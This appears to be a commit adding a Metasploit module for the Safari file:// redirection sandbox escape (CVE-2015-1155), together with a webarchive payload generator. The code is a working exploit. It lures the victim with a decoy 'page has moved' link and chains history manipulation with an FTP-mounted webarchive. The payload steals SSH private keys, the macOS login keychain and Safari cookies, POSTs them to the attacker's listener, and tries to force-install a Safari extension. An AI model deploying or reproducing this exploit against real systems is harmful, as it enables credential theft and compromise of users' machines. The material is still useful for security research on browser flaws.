Add safari module for CVE-2015-1155

bug/bundler_fix
Tod Beardsley 2015-06-23 16:15:50 -05:00
parent a2a231c242
commit 18a9585f7a
No known key found for this signature in database
GPG Key ID: BD63D0A3EA19CAAC
2 changed files with 718 additions and 0 deletions

View File

@ -0,0 +1,369 @@
#safari.installExtension("com.pinterest.extension-HWZFLG9PNK","http://assets.pinterest.com/ext/Pinterest-Safari.safariextz")
module Msf
module Format
module Webarchive
# Registers the datastore options shared by webarchive-format modules:
# output filename, data-collection URI, extra file:// URLs to steal,
# cookie/file stealing toggles, and an optional Safari extension to push.
def initialize(info={})
super
register_options(
[
OptString.new('FILENAME', [ true, 'The file name', 'msf.webarchive']),
OptString.new('GRABPATH', [false, "The URI to receive the UXSS'ed data", 'grab']),
OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive', '/msf.webarchive']),
OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal. $USER will be resolved to the username.', '']),
OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing", true]),
OptBool.new('STEAL_FILES', [true, "Enable local file stealing", true]),
OptString.new('EXTENSION_URL', [false, "HTTP URL of a Safari extension to install"]),
OptString.new('EXTENSION_ID', [false, "The ID of the Safari extension to install"])
],
self.class)
end
### ASSEMBLE THE WEBARCHIVE XML ###
# @return [String] contents of webarchive as an XML document, memoized so
#   the payload is only assembled once per module instance
def webarchive_xml
  @xml ||= webarchive_header + webarchive_footer
end
# @return [String] the first chunk of the webarchive file, containing the WebMainResource
# The WebResourceData element carries the base64-encoded attack HTML, and a
# WebResourceURL of file:/// is what makes Safari render that HTML with
# local-file privileges. The WebSubframeArchives array opened here is left
# unterminated on purpose; #webarchive_footer closes it.
def webarchive_header
%Q|
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>WebMainResource</key>
<dict>
<key>WebResourceData</key>
<data>
#{Rex::Text.encode_base64(iframes_container_html)}</data>
<key>WebResourceFrameName</key>
<string></string>
<key>WebResourceMIMEType</key>
<string>text/html</string>
<key>WebResourceTextEncodingName</key>
<string>UTF-8</string>
<key>WebResourceURL</key>
<string>file:///</string>
</dict>
<key>WebSubframeArchives</key>
<array>
|
end
# @return [String] the closing chunk of the webarchive XML code; terminates
#   the WebSubframeArchives array and the enclosing plist opened by
#   #webarchive_header
def webarchive_footer
  "\n</array>\n</dict>\n</plist>\n"
end
#### JS/HTML CODE ####
# Wraps the result of the block in a minimal HTML5 document and body.
def wrap_with_doc(&blk)
  pieces = ['', '<!doctype html>', '<html>', '<body>', yield.to_s, '</body>', '</html>', '']
  pieces.join("\n")
end
# Wraps the result of the block with <script> tags.
def wrap_with_script(&blk)
  ['<script>', yield, '</script>'].join
end
# @return [String] mark up for embedding the iframes for each URL in a place that is
# invisible to the user
def iframes_container_html
# Park the iframe far off-screen so the victim sees only the decoy message.
hidden_style = "position:fixed; left:-600px; top:-600px;"
wrap_with_doc do
frames = "<iframe src='#{apple_extension_url}' style='#{hidden_style}'></iframe>"
# Order matters: the postMessage listener (communication_js) must be
# installed before the stealing/installer scripts start emitting data.
communication_js + frames + injected_js_helpers + steal_files + install_extension + message
end
end
# @return [String] javascript code, wrapped in script tags, that is inserted into the
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
# and send data out to the listener
# (every postMessage payload is POSTed verbatim to the listener's collection URI)
def communication_js
wrap_with_script do
%Q|
window.addEventListener('message', function(event){
var x = new XMLHttpRequest;
x.open('POST', '#{backend_url}#{collect_data_uri}', true);
x.send(event.data);
});
|
end
end
# @return [String] the Safari extensions gallery URL loaded in the hidden
#   iframe; this is the privileged origin targeted by #install_extension
def apple_extension_url
  "https://extensions.apple.com"
end
# @return [String] javascript, wrapped in a script tag, that repeatedly pops
#   a window attempting to drive safari.installExtension() with the
#   configured extension ID/URL.
#
# EXTENSION_URL and EXTENSION_ID are *optional* options (see #initialize),
# so they are coerced with to_s before base64-encoding; the original code
# passed nil straight into Rex::Text.encode_base64 and crashed when either
# option was unset.
def install_extension
  ext_url = datastore['EXTENSION_URL'].to_s
  ext_id  = datastore['EXTENSION_ID'].to_s
  wrap_with_script do
    %Q|
var extURL = atob('#{Rex::Text.encode_base64(ext_url)}');
var extID = atob('#{Rex::Text.encode_base64(ext_id)}');
setTimeout(function(){
function go(){
window.focus();
window.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', 'x')
}
setInterval(go, 400);
}, 600);
|
  end
end
# @return [String] javascript code, wrapped in a script tag, that steals local files
#   and sends them back to the listener. This code is executed in the
#   WebMainResource (parent) frame, which runs in the file:// protocol.
#
# Only URLs *without* the $USER placeholder are fetched here: no username
# substitution happens in this frame, so templated URLs could never resolve.
# URLs containing $USER are handled per-discovered-user by
# #steal_default_files / #default_files. The original filter was
# double-negated (reject !include?) which kept the templated URLs and
# silently dropped the literal ones.
def steal_files
  return '' unless should_steal_files?
  # Keep only literal (non-$USER) URLs for immediate theft.
  urls_str = (datastore['FILE_URLS'] || '').split(/\s+/).reject { |s| s.include?('$USER') }.join(' ')
  wrap_with_script do
    # NOTE: inside %Q, "\s" is a Ruby escape for a plain space, so the regex
    # must be written "\\s" to emit /\s+/ in the generated javascript
    # (matching the escaping style used in #steal_default_files).
    %Q|
var filesStr = "#{urls_str}";
var files = filesStr.trim().split(/\\s+/).filter(function(f){ return f.length > 0; });
function stealFile(url) {
var req = new XMLHttpRequest();
var sent = false;
req.open('GET', url, true);
req.onreadystatechange = function() {
if (!sent && req.responseText && req.responseText.length > 0) {
sendData(url, req.responseText);
sent = true;
}
};
req.send(null);
};
files.forEach(stealFile);
| + steal_default_files
  end
end
# @return [String] space-separated list of $USER-templated file:// URLs to
#   grab for each discovered user: SSH keys, the login keychain, and any
#   user-supplied FILE_URLS entries that contain the $USER placeholder.
def default_files
  builtin = %w[
    file:///Users/$USER/.ssh/id_rsa
    file:///Users/$USER/.ssh/id_rsa.pub
    file:///Users/$USER/Library/Keychains/login.keychain
  ]
  templated = datastore['FILE_URLS'].split(/\s+/).select { |u| u.include?('$USER') }
  (builtin + templated).join(' ').strip
end
# @return [String] javascript (no surrounding script tag) appended to the
# #steal_files payload. It greps world-readable OS X log files for
# /Users/<name> paths to discover local usernames, then for each user grabs
# Cookies.binarycookies (parsed client-side into a cookie dump) and the
# $USER-templated files from #default_files, exfiltrating everything through
# window.sendData (see #injected_js_helpers). The whole routine is wrapped
# in try/catch so any failure cannot break the rest of the payload.
# NOTE(review): the binarycookies field offsets below follow the commonly
# documented Safari cookie file layout — confirm before modifying.
def steal_default_files
%Q|
try {
function xhr(url, cb, responseType) {
var x = new XMLHttpRequest;
x.onload = function() { cb(x) }
x.open('GET', url);
if (responseType) x.responseType = responseType;
x.send();
}
var files = ['/var/log/monthly.out', '/var/log/appstore.log', '/var/log/install.log'];
var done = 0;
var _u = {};
var cookies = [];
files.forEach(function(f) {
xhr(f, function(x) {
var m;
var users = [];
var pattern = /\\/Users\\/([^\\s^\\/^"]+)/g;
while ((m = pattern.exec(x.responseText)) !== null) {
if(!_u[m[1]]) { users.push(m[1]); }
_u[m[1]] = 1;
}
if (users.length) { next(users); }
});
});
var id=0;
function next(users) {
// now lets steal all the data we can!
sendData('usernames'+id, users);
id++;
users.forEach(function(user) {
if (#{datastore['STEAL_COOKIES']}) {
xhr('file:///Users/'+encodeURIComponent(user)+'/Library/Cookies/Cookies.binarycookies', function(x) {
parseBinaryFile(x.response);
}, 'arraybuffer');
}
if (#{datastore['STEAL_FILES']}) {
var files = '#{Rex::Text.encode_base64(default_files)}';
atob(files).split(/\\s+/).forEach(function(file) {
file = file.replace('$USER', encodeURIComponent(user));
xhr(file, function(x) {
sendData(file.replace('file://', ''), x.responseText);
});
});
}
});
}
function parseBinaryFile(buffer) {
var data = new DataView(buffer);
// check for MAGIC 'cook' in big endian
if (data.getUint32(0, false) != 1668247403)
throw new Error('Invalid magic at top of cookie file.')
// big endian length in next 4 bytes
var numPages = data.getUint32(4, false);
var pageSizes = [], cursor = 8;
for (var i = 0; i < numPages; i++) {
pageSizes.push(data.getUint32(cursor, false));
cursor += 4;
}
pageSizes.forEach(function(size) {
parsePage(buffer.slice(cursor, cursor + size));
cursor += size;
});
reportStolenCookies();
}
function parsePage(buffer) {
var data = new DataView(buffer);
if (data.getUint32(0, false) != 256) {
return; // invalid magic in page header
}
var numCookies = data.getUint32(4, true);
var offsets = [];
for (var i = 0; i < numCookies; i++) {
offsets.push(data.getUint32(8+i*4, true));
}
offsets.forEach(function(offset, idx) {
var next = offsets[idx+1] \|\| buffer.byteLength - 4;
try{parseCookie(buffer.slice(offset, next));}catch(e){};
});
}
function read(data, offset) {
var str = '', c = null;
try {
while ((c = data.getUint8(offset++)) != 0) {
str += String.fromCharCode(c);
}
} catch(e) {};
return str;
}
function parseCookie(buffer) {
var data = new DataView(buffer);
var size = data.getUint32(0, true);
var flags = data.getUint32(8, true);
var urlOffset = data.getUint32(16, true);
var nameOffset = data.getUint32(20, true);
var pathOffset = data.getUint32(24, true);
var valueOffset = data.getUint32(28, true);
var result = {
value: read(data, valueOffset),
path: read(data, pathOffset),
url: read(data, urlOffset),
name: read(data, nameOffset),
isSecure: flags & 1,
httpOnly: flags & 4
};
cookies.push(result);
}
function reportStolenCookies() {
if (cookies.length > 0) {
sendData('cookieDump', cookies);
}
}
} catch (e) { console.log('ERROR: '+e.message); }
|
end
# @return [String] javascript code, wrapped in script tag, that adds a helper function
# called "sendData()" that passes the arguments up to the parent frame, where it is
# sent out to the listener
# (the parent's message handler is installed by #communication_js)
def injected_js_helpers
wrap_with_script do
%Q|
window.sendData = function(key, val) {
var data = {};
data[key] = val;
window.top.postMessage(JSON.stringify(data), "*")
};
|
end
end
### HELPERS ###
# @return [String] the listener path that exfiltrated data is POSTed to,
#   built from URIPATH with the GRABPATH segment appended
def collect_data_uri
  base = datastore['URIPATH'].chomp('/').gsub(/^\//, '')
  "/#{base}/#{datastore['GRABPATH']}"
end

# @return [String] formatted http/https URL of the listener; the port is
#   omitted when it is the default (80)
def backend_url
  scheme = datastore['SSL'] ? 'https' : 'http'
  host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
  port = datastore['HTTPPORT'].to_i == 80 ? '' : ":#{datastore['HTTPPORT']}"
  "#{scheme}://#{host}#{port}"
end

# @return [String] URL path that serves the malicious webarchive
def webarchive_download_url
  datastore['DOWNLOAD_PATH']
end
# @return [String] HTML content that is rendered in the <body> of the webarchive.
def message
  "<p>You are being redirected. <a href='#'>Click here if nothing happens</a>.</p>"
end

# @return [Array<String>] of URLs provided by the user
def urls
  raw = datastore['URLS'] || ''
  raw.split(/\s+/)
end

# @param [String] input the unencoded string
# @return [String] input with dangerous chars replaced with xml entities
def escape_xml(input)
  entities = { '&' => '&amp;', '<' => '&lt;', '>' => '&gt;', "'" => '&apos;', '"' => '&quot;' }
  input.to_s.gsub(/[&<>'"]/) { |char| entities[char] }
end

# @return [Object] truthy when the STEAL_FILES option is enabled
def should_steal_files?
  datastore['STEAL_FILES']
end
end
end
end

View File

@ -0,0 +1,349 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/format/webarchive'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::FtpServer
include Msf::Format::Webarchive
include Msf::Auxiliary::Report
# Module metadata and options for CVE-2015-1155 / ZDI-15-288: Safari's
# mishandling of error-page origins lets this page obtain a file:// origin
# reference; the FTP and HTTP servers below cooperate to serve the redirect
# chain and the malicious webarchive payload.
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X Safari file:// Redirection Sandbox Escape',
'Description' => %q{
Due to an issue in the way Safari handles error page origins,
an attacker who can entice a user into visiting a malicious page
can gain a reference to the resulting error page in the file:// scheme.
From there, the attacker can access cross-domain globals, such as 'location'
and 'history,' which leads to a total compromise of the sandbox.
},
'License' => MSF_LICENSE,
'Author' => [
'joev' # discovery, module
],
'References' => [
['ZDI', '15-288'],
['CVE', '2015-1155']
],
'Platform' => 'osx',
'Targets' =>
[
[ 'Mac OS X', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2014'
))
# SRVPORT is the FTP listener; HTTPPORT serves the exploit/popup pages.
register_options(
[
OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
OptPort.new('SRVPORT', [true, "The local port to use for the FTP server", 8081]),
OptPort.new('HTTPPORT', [true, "The HTTP server port", 8080])
], self.class )
end
# @param c [String, nil] an optional client address used to pick the
#   outbound interface when SRVHOST is a wildcard bind
# @return [String] the address clients should use to reach this host
def lookup_lhost(c=nil)
  # With an explicit SRVHOST, just report it; only a wildcard bind needs the
  # source-address lookup (toward the client, or a routable placeholder).
  return datastore['SRVHOST'] unless datastore['SRVHOST'] == '0.0.0.0'
  Rex::Socket.source_address(c || '50.50.50.50')
end
# HTTP dispatcher for every request hitting our resource path:
# * POST            -> JSON-decoded stolen data, written to loot
# * GET popup_path  -> the popup window running the sandbox-escape JS
# * anything else   -> the decoy page that opens the popup on click
def on_request_uri(cli, req)
if req.method =~ /post/i
begin
# Exfiltrated data may arrive as the POST body or as a ?data= query param.
data_str = if req.body.size > 0
req.body
else
req.qstring['data']
end
data = JSON::parse(data_str || '')
file = record_data(data, cli)
send_response(cli, 200, 'OK', '')
print_good "data #{data.keys.join(',')} received and stored to #{file}"
rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
print_error "Invalid JSON received."
send_not_found(cli)
end
elsif req.uri =~ /#{popup_path}$/
send_response(cli, 200, 'OK', popup_html)
else
send_response(cli, 200, 'OK', exploit_html)
end
end
# @return [String] random six-letter FTP username (memoized per module run)
def ftp_user
@ftp_user ||= Rex::Text.rand_text_alpha(6)
end
# @return [String] random six-letter FTP password (memoized per module run)
def ftp_pass
@ftp_pass ||= Rex::Text.rand_text_alpha(6)
end
# @return [String] the decoy landing page. Any click opens the tiny popup
# window whose javascript (see #popup_html) performs the origin-confusion
# sequence; the popup is opened from a click handler because Safari blocks
# window.open calls that are not triggered by a user gesture.
def exploit_html
%Q|
<html><body>
<script>
window.onclick = function() {
window.open(window.location+'/#{popup_path}', 'x', 'width=1,height=1');
}
</script>
The page has moved. <a href='#'>Click here</a> to be redirected.
</body></html>
|
end
# @return [String] ftp:// URL (with embedded throwaway credentials) that the
#   popup navigates to so Safari auto-mounts our FTP server as a volume
def ftp_url
  creds = "#{ftp_user}:#{ftp_pass}"
  "ftp://#{creds}@#{lookup_lhost}:#{datastore['SRVPORT']}"
end
# @return [String] JS for the popup window. `perform` executes one step every
# 300ms against the opener window: it navigates the opener to unreachable
# localhost ports (producing the error pages whose origin Safari mishandles),
# calls history.pushState on the opener's history to forge file:// entries,
# walks history back onto them, loads #ftp_url so Safari mounts our FTP share
# under /Volumes, then repeats the forgery to make the opener load the
# attacker's webarchive from the mounted share, and finally parks this window
# on the extension-gallery origin for #install_extension.
# NOTE(review): step semantics inferred from the call sequence — confirm
# against the ZDI-15-288 writeup before changing order or timing.
def popup_html
%Q|
<script>
function perform() {
if (arguments.length > 0) {
var nextArgs = Array.prototype.slice.call(arguments, 1);
arguments[0]();
setTimeout(function() {
perform.apply(null, nextArgs);
}, 300);
}
}
perform(
function() { opener.location = 'http://localhost:99999'; },
function() { history.pushState.call(opener.history, {}, {}, 'file:///'); },
function() { opener.location = 'about:blank' },
function() { opener.history.back(); },
function() { window.location = '#{ftp_url}'; },
function() { opener.location = 'http://localhost:99998'; },
function() {
history.pushState.call(
opener.history, {}, {},
'file:///Volumes/#{lookup_lhost}/#{payload_name}'
);
},
function() { opener.location = 'about:blank'; },
function() { opener.history.back(); },
function() { },
function() { window.location = '#{apple_extension_url}'; }
)
</script>
|
end
#
# Handle FTP LIST request (send back the directory listing)
#
def on_client_command_list(c, arg)
conn = establish_data_connection(c)
if not conn
c.put("425 Can't build data connection\r\n")
return
end
print_status("Data connection setup")
c.put("150 Here comes the directory listing\r\n")
print_status("Sending directory list via data connection #{webarchive_size}")
# Fake a unix-style `ls -l` entry advertising the payload with its real
# byte size so the client sees a plausible single-file share.
month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
m = month_names[Time.now.month-1]
d = Time.now.day
y = Time.now.year
dir = "-rwxr-xr-x 1 ftp ftp #{webarchive_size} #{m} #{d} #{y} #{payload_name}\r\n"
print_status dir
conn.put(dir)
conn.close
print_status("Directory sent ok")
c.put("226 Transfer ok\r\n")
return
end
#
# Handle the FTP RETR request. This is where we transfer our actual malicious payload
#
def on_client_command_retr(c, arg)
conn = establish_data_connection(c)
if not conn
return c.put("425 can't build data connection\r\n")
end
print_status("Connection for file transfer accepted")
c.put("150 Connection accepted\r\n")
# Send out payload
conn.put(webarchive)
conn.close
end
# @return [String] random 12-char volume name (memoized)
# NOTE(review): appears unused in this file — the forged history entry uses
# lookup_lhost as the volume name instead; verify before removing.
def volume_name
@volume_name ||= Rex::Text.rand_text_alpha(12)
end
# @return [String] filename advertised over FTP and referenced in the forged
# file:///Volumes/... history entry built by #popup_html
def payload_name
'msf.webarchive'
end
# @return [String] random path segment for the popup page (memoized)
def popup_path
@popup_uri ||= Rex::Text.rand_text_alpha(12)
end
# @return [String] the webarchive XML served as the FTP RETR payload
def webarchive
webarchive_xml
end
# @return [Integer] byte length of the generated webarchive payload, used in
#   the FTP directory listing so the client sees a plausible file entry.
#   (Removed a leftover garbled debug print that fired on every call; the
#   size is already reported by on_client_command_list.)
def webarchive_size
  webarchive_xml.length
end
# Entry point: starts the FTP service, then the HTTP server. start_http
# blocks (it loops while @http_service is set), keeping both listeners
# alive until #cleanup tears them down.
def run
# Start the FTP server
print_status("Running FTP service...")
start_service
# Create our own HTTP server
# We will stay in this function until we manually terminate execution
start_http
end
#
# Handle the HTTP request and return a response. Code borrowed from:
# msf/core/exploit/http/server.rb
#
def start_http(opts={})
# Ensure all dependencies are present before initializing HTTP
use_zlib
comm = datastore['ListenerComm']
if (comm.to_s == "local")
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
# Default the server host / port
opts = {
'ServerHost' => datastore['SRVHOST'],
'ServerPort' => datastore['HTTPPORT'],
'Comm' => comm
}.update(opts)
# Start a new HTTP server
@http_service = Rex::ServiceManager.start(
Rex::Proto::Http::Server,
opts['ServerPort'].to_i,
opts['ServerHost'],
datastore['SSL'],
{
'Msf' => framework,
'MsfExploit' => self,
},
opts['Comm'],
datastore['SSLCert']
)
@http_service.server_name = datastore['HTTP::server_name']
# Default the procedure of the URI to on_request_uri if one isn't
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}.update(opts['Uri'] || {})
proto = (datastore["SSL"] ? "https" : "http")
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
if (opts['ServerHost'] == '0.0.0.0')
print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
end
# Add path to resource
@service_path = uopts['Path']
@http_service.add_resource(uopts['Path'], uopts)
# As long as we have the http_service object, we will keep the ftp server alive
# (cleanup clears @http_service, which ends this loop and the module run)
while @http_service
select(nil, nil, nil, 1)
end
end
#
# Ensures that gzip can be used. If not, an exception is generated. The
# exception is only raised if the DisableGzip advanced option has not been
# set.
#
def use_zlib
  zlib_missing = !Rex::Text.zlib_present?
  compression_requested = datastore['HTTP::compression'] == true
  if zlib_missing && compression_requested
    fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
  end
end
#
# Returns the configured (or random, if not configured) URI path
#
def resource_uri
  path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8 + rand(8))
  path = "/#{path}" unless path.start_with?('/')
  # Persist the normalized path so later lookups agree with the registered resource.
  datastore['URIPATH'] = path
  path
end
#
# Create an HTTP response and then send it
#
# @param cli [Rex::Proto::Http::ServerClient] client connection to answer
# @param code [Integer] HTTP status code
# @param message [String] HTTP status message
# @param html [String] response body, always served as text/html
def send_response(cli, code, message='OK', html='')
proto = Rex::Proto::Http::DefaultProtocol
res = Rex::Proto::Http::Response.new(code, message, proto)
res['Content-Type'] = 'text/html'
res.body = html
cli.send_response(res)
end
# @param [Hash] data the data to store in the log
# @param cli [Rex::Proto::Http::ServerClient] client whose peerhost is recorded
# @return [String] filename where we are storing the data
def record_data(data, cli)
  # Derive a loot filename from the first key, reduced to letters only so a
  # hostile key cannot influence the path. `to_s` guards against an empty
  # JSON object ({} has no keys) crashing the collection server — only
  # JSON::ParserError is rescued upstream in on_request_uri.
  file = File.basename(data.keys.first.to_s).gsub(/[^A-Za-z]/,'')
  store_loot(
    file, "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
  )
end
#
# Kill HTTP/FTP (shut them down and clear resources)
#
def cleanup
  super
  # Kill FTP
  stop_service
  # Best-effort teardown of the HTTP service; individual steps may raise if
  # the service is already partially stopped, hence the bare rescue.
  begin
    @http_service.remove_resource(datastore['URIPATH'])
    @http_service.deref
    @http_service.stop
    @http_service.close
  rescue
  ensure
    # Always clear the handle: start_http's keep-alive loop spins on
    # @http_service, so leaving it set after a failed teardown (as the
    # original code did) would keep the module running forever.
    @http_service = nil
  end
end
end